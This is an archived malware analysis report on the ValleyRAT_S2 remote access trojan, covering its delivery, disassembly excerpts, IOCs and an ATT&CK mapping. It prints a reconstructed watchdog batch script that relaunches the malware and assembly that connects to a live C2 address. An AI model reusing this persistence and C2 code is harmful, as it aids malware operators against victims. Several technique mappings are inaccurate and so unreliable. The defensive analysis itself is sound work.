{
	"id": "6df4ef56-c279-43b2-bee8-251f371ec77d",
	"created_at": "2026-04-06T00:20:20.858116Z",
	"updated_at": "2026-04-10T03:30:57.261184Z",
	"deleted_at": null,
	"sha1_hash": "750a8dbcd47d7d74d6ee28be25dfc790096c91d9",
	"title": "ValleyRAT_S2 Chinese campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1543616,
	"plain_text": "ValleyRAT_S2 Chinese campaign\r\nBy APOPHIS\r\nPublished: 2026-02-18 · Archived: 2026-04-05 21:48:45 UTC\r\n11 min read\r\nJan 11, 2026\r\nPress enter or click to view image in full size\r\nValleyRAT_S2 represents the second-stage payload of the ValleyRAT malware family, a sophisticated Remote\r\nAccess Trojan (RAT) written in C++. This modular and stealthy malware has been actively used in cyber-espionage and financially motivated campaigns, primarily targeting Chinese-speaking regions, including mainland\r\nChina, Hong Kong, Taiwan, and Southeast Asia.\r\nThe S2 payload serves as the functional core of the malware, activated after successful initial infection. While\r\nStage 1 handles infiltration and evasion, Stage 2 implements the primary backdoor capabilities, command and\r\ncontrol communications, persistence mechanisms, and comprehensive system reconnaissance.\r\nDistribution Methods\r\n1. Fake Software Installers\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 1 of 17\n\nValleyRAT commonly disguises itself within:\r\nFake productivity tools (e.g., “AI表格生成工具” — AI-based spreadsheet generator)\r\nCracked or unofficial software downloads\r\nLegitimate-looking Chinese-language utilities\r\n2. DLL Side-Loading\r\nA primary and sophisticated delivery mechanism:\r\nLegitimate signed applications load malicious DLLs placed in the same directory.\r\nMalware DLLs mimic common library names (steam_api64.dll, apphelp.dll)\r\nExports are expected to maintain legitimacy\r\nAdvantages of this technique:\r\nEvades signature-based antivirus detection\r\nBypasses User Account Control (UAC) when executed correctly\r\nBlends seamlessly with legitimate software behavior\r\n3. Phishing Email Campaigns\r\nDeployed through targeted phishing operations:\r\nMalicious document attachments (.doc, .xls, .pdf)\r\nCompressed archives (.zip, .rar) containing disguised executables\r\nSocial engineering targeting specific organizations\r\n4. Software Update Abuse\r\nExploitation of legitimate update mechanisms:\r\nCompromise of update channels in popular local Chinese software\r\nInjection into software distribution networks\r\nAbuse of trusted software vendors’ infrastructure\r\nCore Capabilities Analysis\r\nSystem Reconnaissance\r\nThe malware performs a comprehensive system enumeration:\r\n· Operating System Information: Version, locale, architecture, environment variables\r\n· Registry Analysis: Policy settings, installed software detection\r\n· File System Scanning: Hidden drives, removable media, network shares\r\n· Process Enumeration: Running processes via snapshot APIs\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 2 of 17\n\n· Geolocation Data: Collection through locale APIs\r\nPersistence and Evasion Mechanisms\r\nAdvanced techniques for maintaining long-term access:\r\n· Task Scheduler Integration: Uses COM API for automatic startup\r\n· Volume Shadow Copy Manipulation: WMI and COM APIs for potential ransomware staging\r\n· DLL Masquerading: Impersonates legitimate system libraries\r\n· Sandbox Detection: Heuristic analysis to detect analysis environments\r\n· API Obfuscation: Dynamic resolution using GetProcAddress and LoadLibrary\r\nCode Injection and Lateral Movement\r\nSophisticated injection capabilities:\r\n· Thread Context Manipulation: Uses SetThreadContext for process hijacking\r\n· Memory Injection: WriteProcessMemory and CreateRemoteThread for payload delivery\r\n· Windows Hook Integration: SetWindowsHookEx for keystroke monitoring and control\r\nCommand and Control (C2) Infrastructure\r\nRobust communication framework:\r\n· Hardcoded Endpoints: IPs and ports (27.124.3.175:14852)\r\n· Custom Protocol: TCP-based communication with proprietary format\r\n· Traffic Mimicry: HTTP tunneling and benign traffic patterns\r\n· Modular Commands: File upload/download, shell execution, payload injection, credential harvesting\r\nTechnical Analysis\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\AI自动化办公表格制作生成工具安装包\\steam_api64.dll\r\n(Translated: “AI Automated Office Spreadsheet Creation Tool Installer”)\r\nThis path suggests the malware was disguised as a productivity tool or software update.\r\nAt this function, we can notice a command execution routine. Its purpose is to launch a Windows command shell\r\n( cmd.exe ), wait until that shell completes execution, and then clean up any process handles\r\nWhat This Function Does in Detail\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 3 of 17\n\n1. Constructs a SHELLEXECUTEINFO Structure on the Stack\r\nThe function sets up the necessary structure for a ShellExecuteExA call. This includes:\r\ncbSize = 0x40 → Size of the structure.\r\nlpVerb = \"open\" → Indicates an \"open\" action for the file.\r\nlpFile = \"cmd.exe\" → The executable to be run.\r\nOther members likely include:\r\nnShow = SW_HIDE Or similar, to launch the shell invisibly (not shown in your screenshot but typical of malware\r\nbehavior).\r\nfMask = SEE_MASK_NOCLOSEPROCESS To ensure it retrieves a process handle to wait on.\r\nThis structure is stored in local variables (stack space from [ebp-0F8h] to [ebp-0C4h] ), mimicking how\r\nstandard ShellExecuteExA works.\r\n2. Launches cmd.exe via ShellExecuteExA\r\nThe attacker-controlled or hardcoded executable ( cmd.exe ) is executed using ShellExecuteExA , which is more\r\nflexible than CreateProcess and can bypass certain security software detections or application whitelisting\r\nmechanisms.\r\nThis API spawns a child process ( cmd.exe ) and returns a process handle through SHELLEXECUTEINFO.hProcess .\r\nIf the launch fails (e.g., the structure is not correctly initialized or cmd.exe is missing, the function skips further\r\nexecution.\r\n3. Synchronizes Execution — Waits for Completion\r\nIf the shell process starts successfully and a valid handle is returned, the function calls WaitForSingleObject\r\nwith INFINITE timeout ( 0xFFFFFFFF ):\r\nThis causes the malware to pause until it cmd.exe completes, ensuring serialized execution. In other words, no\r\nfurther payloads or instructions are executed until this shell process exits.\r\nThis ensures attackers’ commands are fully executed before the RAT proceeds or terminates.\r\n4. Cleans Up Resources — Closes Process Handle\r\nAfter the process has exited, the function calls CloseHandle on the process handle. This is proper cleanup and\r\nindicates deliberate, structured malware code (as opposed to sloppy or amateurish design). It minimizes suspicion\r\nfrom tools monitoring open handles or memory leaks.\r\nPress enter or click to view image in full size\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 4 of 17\n\nThis function is responsible for staging the environment, preparing filenames and paths, writing marker or\r\nhelper files, and then executing a secondary component, such as a batch file or injected payload.\r\n1. Structured Exception Handling (SEH) Setup for Crash Resistance\r\nThe function begins by configuring its own custom SEH handler. This helps it recover cleanly from errors or\r\navoid crashing in sandbox environments, which is a known evasion technique in advanced malware.\r\nBehavioral Outcome:\r\n· Protects the execution from abnormal termination\r\n· Increases stealth against sandboxes and AVs\r\n2. Staging Temporary Environment in %TEMP%\r\nThe malware uses the GetTempPathA API to retrieve the system's temporary directory (e.g.,\r\nC:\\Users\\Victim\\AppData\\Local\\Temp\\ ). It then uses this base path to generate dynamic filenames.\r\nBehavioral Outcome:\r\n· Avoids static file paths (makes IOC detection harder)\r\n· Ensures the payloads drop in a writable, user-specific location\r\n3. Generates and Writes target.pid\r\nIt builds a file path like %TEMP%\\target.pid and calls a helper function ( sub_10007EF0 ) to likely write data into\r\nit. This file might contain:\r\n· A target process ID for future injection or monitoring\r\n· Configuration or timestamp data\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 5 of 17\n\nBehavioral Outcome:\r\n· Prepares synchronization or configuration markers\r\n· Possible inter-process coordination (IPC)\r\n4. Prepares and Writes monitor.bat\r\nAnother temporary file is created called monitor.bat . This file is built dynamically using string functions, and\r\nit’s likely written to disk.\r\nIts purpose could be to:\r\n· Act as a persistence mechanism\r\n· Restart the RAT in case of failure\r\n· Be executed on boot or via Task Scheduler\r\n5. Executes a Process (Likely monitor.bat )\r\nUsing the initialized data, a custom process creation function is called. This results in the execution of a child\r\nprocess (probably monitor.bat ), which could:\r\n· Act as a watchdog\r\n· Start the final payload\r\n· Create scheduled tasks or perform privilege escalation\r\nThis is a staged batch script generator routine — it writes several lines into a memory buffer (at var_110 ) to later\r\nbe saved as a .bat file ( monitor.bat ). Here's what this script does:\r\nPress enter or click to view image in full size\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 6 of 17\n\nGenerated Batch Script Behavior\r\n@echo off\r\nset \"PIDFile=%TEMP%\\target.pid\"\r\nset \"VBSPath=\u003cdynamically given path\u003e\"\r\nset /p pid=\u003c\"%PIDFile%\"\r\ndel \"%PIDFile%\"\r\n:check\r\ntasklist /fi \"PID eq %pid%\" | findstr \u003enul\r\nif errorlevel 1 (\r\ncscript //nologo \"%VBSPath%\"\r\nexit ) timeout /t 15\r\ngoto check\r\nPurpose \u0026 Malware Behavior\r\nThis is a watchdog batch script generator. Its job is to:\r\n· Monitor a process (by PID)\r\n· Restart the malware via a VBS script if killed\r\n· Stay persistent in memory\r\n· Evade user attention (silent \u0026 headless)\r\nPress enter or click to view image in full size\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 7 of 17\n\n1. Folder Path Resolution Using CSIDL\r\npush 1Ah; CSIDL_APPDATA\r\n· CSIDL 0x1A refers to the APPDATA folder (typically C:\\Users\\\u003cuser\u003e\\AppData\\Roaming ).\r\n· A call is made to a subroutine ( sub_1000A760 ) that likely wraps SHGetFolderPathA or similar to resolve this\r\npath.\r\n· The result is stored in [ebp-84h] , then moved to [ebp-88h] for future use.\r\nPurpose: To prepare a base directory (AppData\\Roaming) for writing files or building paths.\r\n2. Concatenates Subpath \\Promotions\\Temp.aps\r\npush offset aPromotionsTemp ; \"\\\\Promotions\\\\Temp.aps\"\r\npush edx ; AppData path\r\ncall sub_10007EF0 ; likely a `PathCombine` or `sprintf` variant\r\n· Constructs a full path like:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Promotions\\Temp.aps\r\nPress enter or click to view image in full size\r\nPurpose: Preparing for storing or staging malware data/config.\r\n3. Sleep Delay\r\npush 0x3A98 ; 15000 ms = 15 seconds\r\ncall Sleep\r\n· Delays execution, often used to:\r\no Evade sandbox timeouts\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 8 of 17\n\no Wait for parent process to finish\r\no Time synchronization between threads\r\n4. Memory Construction of Telegra.exe\r\nmov byte ptr [ebp-28h], 54h ; 'T'\r\nmov byte ptr [ebp-27h], 65h ; 'e'\r\nmov byte ptr [ebp-26h], 6Ch ; 'l'\r\nmov byte ptr [ebp-1Dh], 65h ; 'e'\r\n· Builds the ASCII string \"Telegra.exe\" into stack memory (starting at [ebp-28h] ).\r\n· Used later as a filename or argument to a function.\r\nPurpose: Stage payload under a benign name (like Telegram) to evade detection or trick users/analysts.\r\n5. Memory Construction of WhatsApp.exe\r\nmov byte ptr [ebp-48h], 57h ; 'W'\r\nmov byte ptr [ebp-47h], 68h ; 'h'\r\nmov byte ptr [ebp-3Dh], 65h ; 'e'\r\nPurpose: Possibly used for masquerading, side-loading, or injecting into a legitimate-looking process.\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 9 of 17\n\nDNS Resolution \u0026 C2 Prep\r\nGet APOPHIS’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n1. Preparation of addrinfo Hints Structure\r\nThe malware prepares a struct addrinfo (likely on the stack) used as a filter for resolving hostnames:\r\nmov [ebp+Hints.ai_flags], ecx\r\nmov [ebp+Hints.ai_family], ecx ; AF_UNSPEC (0)\r\nmov [ebp+Hints.ai_socktype], 1 ; SOCK_STREAM (TCP)\r\nmov [ebp+Hints.ai_protocol], 6 ; IPPROTO_TCP\r\nPurpose: Tells getaddrinfo to:\r\nUse any IP version (IPv4/6)\r\nUse TCP streams\r\nPrefer TCP over UDP\r\n2. Hostname \u0026 Port Setup\r\npush offset aServiceName; “14852”\r\npush offset aNodeName ; “27.124.3.175”\r\ncall ds:getaddrinfo\r\nPurpose: Resolves the IP and port into a sockaddr for creating a connection to the Command-and-Control (C2)\r\nserver.\r\n3. Handling the Result\r\nmov [ebp+ppResult], eax\r\ntest edx, edx\r\njz loc_10013586\r\ngetaddrinfo returns a result in eax.\r\nIf it fails (edx == 0), the function jumps to an error handler or a retry loop.\r\n4. Sleep on Failure\r\npush 088Bh; Sleep 2187 ms\r\ncall Sleep\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 10 of 17\n\nIf resolution fails, the malware sleeps ~2.2 seconds before retrying.\r\nThis is a stealth mechanism to avoid aggressive network activity or detection.\r\nPress enter or click to view image in full size\r\nFinally, I developed a C2 configuration extractor tailored for the sample I analyzed, which successfully parsed the\r\nbinary and extracted the embedded C2 servers. The extractor successfully identified and retrieved the hardcoded\r\nC2 IP addresses from the file.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 11 of 17\n\nValleyRAT_s2 MITRE ATT\u0026CK Framework Mapping\r\nInitial Access\r\nT1566.001 — Phishing: Spearphishing Attachment\r\nEvidence: Delivered via malicious document attachments (.doc, .xls, .pdf)\r\nBehavior: Archives (.zip, .rar) containing disguised executables and sideloaded DLLs\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nEvidence: Abuse of update mechanisms in popular tools (smaller/local Chinese software)\r\nBehavior: Infiltration through legitimate software update processes\r\nExecution\r\nT1204.002 — User Execution: Malicious File\r\nEvidence: Fake software installers disguised as productivity tools\r\nBehavior: “AI表格生成工具” (AI-based spreadsheet generator), cracked software downloads\r\nT1059.003 — Command and Scripting Interpreter: Windows Command Shell\r\nEvidence: Function launches cmd.exe via ShellExecuteExA\r\nBehavior: Constructs the SHELLEXECUTEINFO structure, waits for completion with\r\nWaitForSingleObject\r\nT1059.005 — Command and Scripting Interpreter: Visual Basic\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 12 of 17\n\nEvidence: Generated batch script calls VBScript (cscript //nologo)\r\nBehavior: Watchdog mechanism using VBS for persistence\r\nT1059.001 — Command and Scripting Interpreter: PowerShell\r\nEvidence: Batch script generation for process monitoring\r\nBehavior: Creates monitor.bat for automated execution\r\nPersistence\r\nT1053.005 — Scheduled Task/Job: Scheduled Task\r\nEvidence: Registers itself via the Task Scheduler COM API\r\nBehavior: Survives system reboots through scheduled task creation\r\nT1574.002 — Hijack Execution Flow: DLL Side-Loading\r\nEvidence: Masquerades as legitimate DLLs (steam_api64.dll, apphelp.dll)\r\nBehavior: Placed in the same directory as legitimate applications, evades signature-based detection\r\nT1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup\r\nFolder\r\nEvidence: Watchdog batch script for automatic restart\r\nBehavior: Monitor.bat ensures malware restarts if killed\r\nPrivilege Escalation\r\nT1055.002 — Process Injection: Portable Executable Injection\r\nEvidence: Uses SetThreadContext, WriteProcessMemory, CreateRemoteThread\r\nBehavior: Injects code into legitimate processes\r\nT1055.003 — Process Injection: Thread Execution Hijacking\r\nEvidence: SetThreadContext API usage\r\nBehavior: Hijacks thread execution in target processes\r\nDefense Evasion\r\nT1574.002 — Hijack Execution Flow: DLL Side-Loading\r\nEvidence: steam_api64.dll masquerades as a legitimate Steam API\r\nBehavior: Bypasses User Account Control (UAC), evades signature-based AVs\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 13 of 17\n\nT1027.002 — Obfuscated Files or Information: Software Packing\r\nEvidence: Uses software packing to delay sandbox unpacking\r\nBehavior: Obfuscated code structure, potential string/section encryption\r\nT1036.005 — Masquerading: Match Legitimate Name or Location\r\nEvidence: Mimics legitimate applications (Telegra.exe, WhatsApp.exe)\r\nBehavior: Uses familiar application names to avoid suspicion\r\nT1497.001 — Virtualization/Sandbox Evasion: System Checks\r\nEvidence: Detects sandbox/debugging environments via heuristics\r\nBehavior: Anti-debugging techniques, structured exception handling (SEH)\r\nT1055.012 — Process Injection: Process Hollowing\r\nEvidence: Hooks into Windows messaging APIs via SetWindowsHookEx\r\nBehavior: Keystroke monitoring and control hijacking\r\nT1070.004 — Indicator Removal on Host: File Deletion\r\nEvidence: Batch script deletes PID file after reading\r\nBehavior: del “%PIDFile%” command removes tracking files\r\nDiscovery\r\nT1082 — System Information Discovery\r\nEvidence: GetEnvironmentStrings API usage\r\nBehavior: Collects OS version, locale, architecture, and environment variables\r\nT1057 — Process Discovery\r\nEvidence: Process32First, CreateToolhelp32Snapshot, Process32Next APIs\r\nBehavior: Enumerates running processes using snapshot APIs\r\nT1012 — Query Registry\r\nEvidence: RegOpenKey, RegQueryValueEx APIs\r\nBehavior: Queries registry keys for policy settings and software presence\r\nT1518 — Software Discovery\r\nEvidence: Loops through the file system and registry\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 14 of 17\n\nBehavior: Identifies installed software and configurations\r\nT1083 — File and Directory Discovery\r\nEvidence: FindFirstFileEx, GetFileSizeEx APIs\r\nBehavior: Scans file systems, including hidden and removable drives\r\nT1614 — System Location Discovery\r\nEvidence: GetLocaleInfo API\r\nBehavior: May collect geolocation data from locale APIs\r\nT1120 — Peripheral Device Discovery\r\nEvidence: Enumerates connected drives\r\nBehavior: Discovers removable media and network drives\r\nCollection\r\nT1005 — Data from Local System\r\nEvidence: File system scanning capabilities\r\nBehavior: Harvests data from local storage devices\r\nT1056.001 — Input Capture: Keylogging\r\nEvidence: SetWindowsHookEx API for keystroke monitoring\r\nBehavior: Captures user input through Windows message hooks\r\nCommand and Control\r\nT1071.001 — Application Layer Protocol: Web Protocols\r\nEvidence: May tunnel over HTTP or mimic benign traffic patterns\r\nBehavior: Evades firewall detection through protocol mimicry\r\nT1573.001 — Encrypted Channel: Symmetric Cryptography\r\nEvidence: Custom TCP-based protocol\r\nBehavior: Uses hardcoded IPs and ports\r\nT1105 — Ingress Tool Transfer\r\nEvidence: Can receive modular commands\r\nBehavior: Upload/download files, inject payloads\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 15 of 17\n\nT1071.004 — Application Layer Protocol: DNS\r\nEvidence: DNS resolution for C2 communication\r\nBehavior: getaddrinfo calls to resolve 27.124.3.175:14852\r\nExfiltration\r\nT1041 — Exfiltration Over C2 Channel\r\nEvidence: Custom TCP protocol for data transmission\r\nBehavior: Exfiltrates collected data through established C2 channels\r\nImpact\r\nT1490 — Inhibit System Recovery\r\nEvidence: Uses Volume Shadow Copy, WM, I, and COM APIs\r\nBehavior: Potentially stages for ransomware deployment\r\nT1489 — Service Stop\r\nEvidence: Process monitoring and termination capabilities\r\nBehavior: Watchdog script monitors and controls process execution\r\nIOCs\r\nFile Hashes:\r\nd6387be78d258a820e4cb35ec53c65d52a813b63147488629b56269f6648adc1 \u003e\u003e valleyrat_s2\r\nNetwork Indicators:\r\n27.124.3.175:14852\r\nFile Paths:\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\AI自动化办公表格制作生成工具安装包\\steam_api64.dll\r\n%TEMP%\\target.pid\r\n%TEMP%\\monitor.bat\r\n%APPDATA%\\Promotions\\Temp.aps\r\nProcess Names:\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 16 of 17\n\nsteam_api64.dll\r\nTelegram.exe\r\nWhatsApp.exe\r\nmonitor.bat\r\nConclusion\r\nValleyRAT_S2 represents a sophisticated and well-engineered threat with advanced persistence, evasion, and\r\ncommand execution capabilities. Its modular design and focus on Chinese-speaking regions indicate a targeted\r\napproach to cyber-espionage and financial crime. Organizations should implement comprehensive defense\r\nstrategies, including network monitoring, behavioral analysis, and user education, to effectively counter this\r\nthreat.\r\nThe malware’s use of legitimate software masquerading, advanced injection techniques, and robust C2\r\ninfrastructure demonstrates the evolving sophistication of modern RAT families. Continuous monitoring and\r\nadaptive security measures are crucial for an effective defense against advanced persistent threats.\r\nSource: https://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nhttps://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://apophis133.medium.com/valleyrat-s2-chinese-campaign-4504b890f416"
	],
	"report_names": [
		"valleyrat-s2-chinese-campaign-4504b890f416"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434820,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.pdf",
		"text": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.txt",
		"img": "https://archive.orkl.eu/750a8dbcd47d7d74d6ee28be25dfc790096c91d9.jpg"
	}
}